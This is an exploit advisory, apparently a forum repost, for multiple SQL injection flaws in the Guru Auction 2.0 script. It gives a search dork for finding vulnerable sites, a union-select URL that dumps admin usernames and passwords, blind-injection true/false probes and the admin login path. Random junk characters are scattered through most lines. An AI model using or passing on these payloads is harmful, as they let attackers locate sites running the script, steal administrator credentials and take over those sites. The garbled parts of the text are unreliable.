Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
4 K0 B. \$ _4 ?0 |$ z) A$ D t
- U* u& y2 q; y. w作者 : v3n0m% W: v9 @ `# g: G
应用 : Guru Auction 2.0. {: G2 V4 x- V* N9 H. ?" }2 }
Price : $49/ G4 c7 P1 T: N( }3 m* K
Vendor : http://www.guruscript.com/! B6 w6 [9 c4 n" R/ r. H+ [7 |, `" K
Google Dork : inurl:subcat.php?cate_id=
+ D) _ M3 z0 R3 h ; B& H+ F. s4 X" k p
SQLi p0c:3 U: P r* s* @! O/ w% Z
~~~~~~~~~~" N6 ^$ w; w: N8 j; ?; [$ F
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
- L% w# X" \6 ?$ V( C# w$ ]
0 c$ F/ p+ t$ R4 { 7 D( E1 }1 V9 ~: a
盲注 p0c:( d% ^- w8 ?0 B: `3 n
~~~~~~~~~~- {% g; p# M2 s1 ^# @
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
% m) W- ], W6 m8 U5 H0 J! o+ ?2 Dhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false0 [4 T4 Z! k/ g5 k3 N
% o% S) t+ H. l; j* b9 T
管理登录入口:" Z. g( M6 ~* p% Y; U
~~~~~~~~~~
6 E; N: I% j( jhttp://domain.tld/[path]/admin/) y, t' f6 y% c+ _
|